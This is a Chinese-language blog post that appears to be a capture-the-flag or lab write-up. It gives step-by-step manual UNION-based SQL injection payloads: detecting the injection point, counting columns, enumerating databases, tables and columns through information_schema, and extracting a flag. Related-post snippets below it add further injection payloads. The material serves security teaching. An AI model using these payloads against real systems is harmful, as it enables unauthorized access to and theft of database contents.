一次简单的纯手工显错注入

最新推荐文章于 2024-07-23 21:39:06 发布
最新推荐文章于 2024-07-23 21:39:06 发布
阅读量627 收藏
点赞数
文章标签: 手工注入 显错注入 注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42097777/article/details/88902227
版权

# 注入的两个条件:1.用户可以控制传参,2.用户输入的语句被带入数据库进行查询

**注:这里还要利用到了一个函数group_concat( ),意思是将查询的结果并排 拼接一起展示,不然输出点只能显示一个表名或者字段

1.利用and1=1 显示正常, and 1=2 显示错误页面。证明有注入点
2。order by 语句查询有几个字段,为了后面使用联合查询
例如,order by 4 出错,order by 3 显示正确,判断为3个字段
在这里插入图片描述
3.使用union 联合查询 显错点,输出点
语句:
and 1=2 union select 1,2,3
在这里插入图片描述
显错点为2,3
4.查询当前库名
语句:
and 1=2 union select 1,database(),3
在这里插入图片描述
当前库名为security
5。查表名,利用当前库名查系统表
语句:
and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=“security”
在这里插入图片描述
这里利用到了一个函数group_concat( ),意思是将查询的结果并排 拼接一起展示
不然输出点只能显示一个表名
6。查字段,利用表名查系统表
语句:
and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=“zkaq”
在这里插入图片描述
7.查表内的信息
语句:
and 1=2 union select 1,group_concat(flag),group_concat(zKaQ) from zkaq
在这里插入图片描述
我们想要的表内的所有信息如图展示

我们也得到了我们需要的信息:flag为:zKaQ-ErR0rBaS4d,
一次简单的手工注入成功

liam liang
关注
高性能零售IT系统的建设05-从0打造一个每秒万级并发的互联网交易系统的技术全架构
lifetragedy的专栏
10-13 3246
亿万级的流量、每秒万级的并发的大型零售商超金融类应用如何设计与架构?如何面对汹涌的流量?本篇以全景式架构设计展示并结合一个个生产实例带你一步步深入了解如何应对大规模的高并发高流量的业务场景系统架构之美。
【ctfshow】web篇-SQL注入 wp
孤桜懶契
08-21 4494
前言 记录web的题目wp,慢慢变强,铸剑。 SQL注入 web171 根据语句可以看到有flag没有被显示出来,让我们拼接语句来绕过 //拼接sql语句查找指定ID用户 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; GET传参会自己解码,注释可以用%23(#), --空格,–+等,或者拼接语句不用注释也行 判断有3个字段
一次注册功能处Mysql手工报错注入
qq_36270253的博客
04-01 4173
一次注册功能处Mysql手工报错注入 知识点:报错注入是使用一些指定的函数来制造报错,从而从报错信息中获取设定的信息,比如select/insert/update/delete都可以使用报错来获取信息,报错注入的使用前提条件,是后台没有屏蔽数据库的报错信息,在语法发生错误的时候会显示在客户前端页面。 /////////分////////////割/////////\\\\\\线\\\\\\\\\\\ 安卓app除了反编译apk外,各功能点也有几率存在漏洞,甚至攻防演练的时候也可以从app资产寻找突破口。
Sql Server 手工注入总结(显错模式)
桦少's blog
01-31 954
--显错模式总结,利用类型转换报错。 --1=convert(int,(@@version)) --1=convert(int,(select host_name())) --and 1=convert(int,(user)) --爆表名记录条数。replace(字段名,' ','') select replace(str(count(*))+'N',' ','') from sys
几种常见的报错注入类型详解
最新发布
m0_74312676的博客
07-23 1089
报错注入是一种通过引起数据库报错并从错误信息中提取有用信息的SQL注入攻击手法;攻击者利用数据库在处理异常情况时返回的错误消息,来推断出数据库结构、字段名甚至数据内容;这种攻击方法依赖于数据库将详细的错误消息返回给客户端。若在测试时发现网页会回显sql相关的报错信息,那么此时就可以尝试使用错误注入这种方式进行渗透。可以利用报错注入的前提:就是页面有错误信息显示出来、保证函数能够正确执行。
SQL手工注入漏洞测试(Sql Server数据库)
weixin_33853827的博客
01-21 113
还是先找到注入点,然后order by找出字段数:4 通过SQL语句中and 1=2 union select 1,2,3……,n联合查询,判断显示的是哪些字段,就是原本显示标题和内容时候的查询字段。此处返回的是错误页面,说明系统禁止使用union进行相关SQL查询,我们得使用其他方式进行手工SQL注入。 一、盲注 盲猜爆出表名 通过SQL语句中的a...
webug 4.0 第一关 显错注入没有显错
03-24 1128
按照这位大佬的攻略去试了一下 发现没有显错 然后看了一下源码 因为本人是做 java 开发的,不太熟悉,调试就免了,但是乍看之下没问题,直接改代码观察一下: $res = die("Invalid query: ". mysqli_stmt_error(). $sql); " ' "被自动转义成"\'"了,所以怎么查都没问题。 ...
SQL注入显错注入
秋水的博客
08-30 3706
MySQL基础知识 系统自带库information_schema中存在tables表和columns表,我们可以通过这两个表查询相关信息 distinct关键字,distinct用于去除查询中的重复,可以用information_schema.tables中的TABLE_SCHEMA字段查询出所有库信息 group_concat()函数,此函数只有MySQL中存在,作用是把查询出的内容通...
mysql sql注入漏洞修复_SQL注入漏洞解析与靶场复现
weixin_36043375的博客
02-26 1312
1. 概述SQL注入(SQL Injectioin)漏洞是注入漏洞中危害性最高的漏洞之一。形成的原因主要是在数据交互过程中,前端的数据传入后端时,没有作严格的验证过滤导致传入的“数据”拼接到了SQL语句中。被数据库当作SQL语句的一部分执行,从而使得数据面临被脱库、恶意破坏篡改甚至造成整个系统权限沦陷等一系列危害。注入攻击的本质是把用户输入的数据当作代码执行。造成注入攻击有两个关键条件:①用户能够...
sql注入学习
wssmiss的博客
07-10 287
sql注入简单介绍 sql注入的原理; 攻击者利用web应用程序对用户输入验证上的疏忽,在输入的数据中包含对某些数据库系统游曳数意义的负号或命令,让攻击者有机会直接对后台数据库系统下达指令,进而实现对后台数据库乃至整个应用系统的入侵 代码示例 正常情况: 一个登陆界面,用户输入用户名和密码后,如id=112145 ,password=abcd 其php连接后台数据库执行的代码是 select...
Web安全Day1 - SQL注入实战攻防
hongrisec的博客
02-20 3184
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.Web安全Day1 - SQL注入实战攻防 https://mp.weixin.qq.com/s/zP0MZNhnZG_S9aoHDXzvWA 1. SQL注入 1.1 漏洞简介 结构化查询语言(Structured Query Language...
GET和POST的区别
weixin_30645617的博客
08-28 144
1.GET把参数包含在URL中,POST通过request body传递参数。 2.GET在浏览器回退时是无害的,而POST会再次提交请求。 3.GET产生的URL地址可以被Bookmark,而POST不可以。 4.GET请求会被浏览器主动cache,而POST不会,除非手动设置。 5.GET请求只能进行url编码,而POST支持多种编码方式。 6.GET...
SQL学习(CTFhub)整数型注入,字符型注入,报错注入 -----手工注入+ sqlmap注入
qq_73861475的博客
11-13 618
1 order by 1,接着尝试爆1 order by 2, 1 order by 3,结果到1 order by 3出现报错,由此可以判断,表格中有两个字段。id=1 -D (数据库名) -T (输入需要查询的表名) -C (表内的字段名) --dump。id=1 -D (数据库名) -T (输入需要查询的表名) --columns。-1' union select 1,database() #(这里的-1和整数型注入的情况一样)那就输入1' ,发现报错没有回显,接着输入1' and 1=1。
手工操作几种常见SQL注入
X1DD1Asad343的博客
06-20 1885
是一种结合数据库原始报错信息和union查询的注入方式使用场景:数据库中查询的结果能够直接在前端页面中展示出来。
SQL--报错注入学习
Z11762的博客
04-04 890
报错注入就是通过一些函数的错误使用后从报错的内容中获取信息,就是在可以进行的位置,调用特殊的函数执行,利用函数报错使其输出错误结果来获取数据库的相关信息。当注入点不回显数据库查询的数据,那么通过一般的注入手段是无法返回相关数据库的信息,但是,如果查询时输入错误SQL代码会报错,并且是通过mysql_error(),mysqli_error()等返回错误,那么就存在报错注入的可能性。(1).BigInt数据类型溢出。
sql注入显错注入
qq_33557485的博客
05-05 1797
1.判断是否存在注入点: 在正常输入后面添加and 1=1 查看是否正常回显。如果一切正常说明该处存在注入点。#是数据库查询的结束标志。?id=1' and 1=1# 这里的?id=1’使用单引号闭合查询语句。不同的查询写法使用响应的闭合方式 2.猜解字段数。 每一个数据库查询语句的结果都是一个表格,使用order by查询该查询结果一共查询了几个字段。因为使用union查询前后的字段数必须...
SQL注入之mysql显错注入
weixin_34060741的博客
11-12 866
在我们实际渗透中,明明发现一个注入点,本以为丢给sqlmap就可以了,结果sqlmap只显示确实是注入点,但是数据库却获取不了,如图1所示,这时我们可以使用手工进行注入,判断出过滤规则以及基本过滤情况,然后再选择对应的sqlmap脚本(如果有的话),本文主要是讲述如何通过mysql函数报错来进行注入,另外如何使用手工进行全程注入的利用过程,如果你...
webug 1、显错注入
乔木同学
03-15 324
webug,显错注入
网络安全之webug显错注入实战
weixin_44255593的博客
02-22 398
一、实验所需函数 1. concat(str1,str2,...)返回结果为参数间无间隔符连接起来的字符串,如果其中有一个参数为NULL,返回结果为NULL 2. concat_ws(separator, str1, str2, ...) 含有分隔符连接字符串,第一个参数为制定的分隔符 3. group_concat(str1,str2,...)连接一个组的所有字符串,并以逗号分隔每一条数据 4.union 用于合并两个或多个select语句的结果集,需要注意的是union内部的select须拥有相同数量的
SQL注入攻击详解:手工注入命令与技巧
"本文档详细介绍了SQL手工注入攻击的相关知识,包括如何判断注入点、查询数据库内容的方法。主要涉及的标签有手工注入、SQL注入、SQL盲注以及注入语句。文档内容展示了针对不同数据库(如ACCESS和MySQL)的查询示例...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值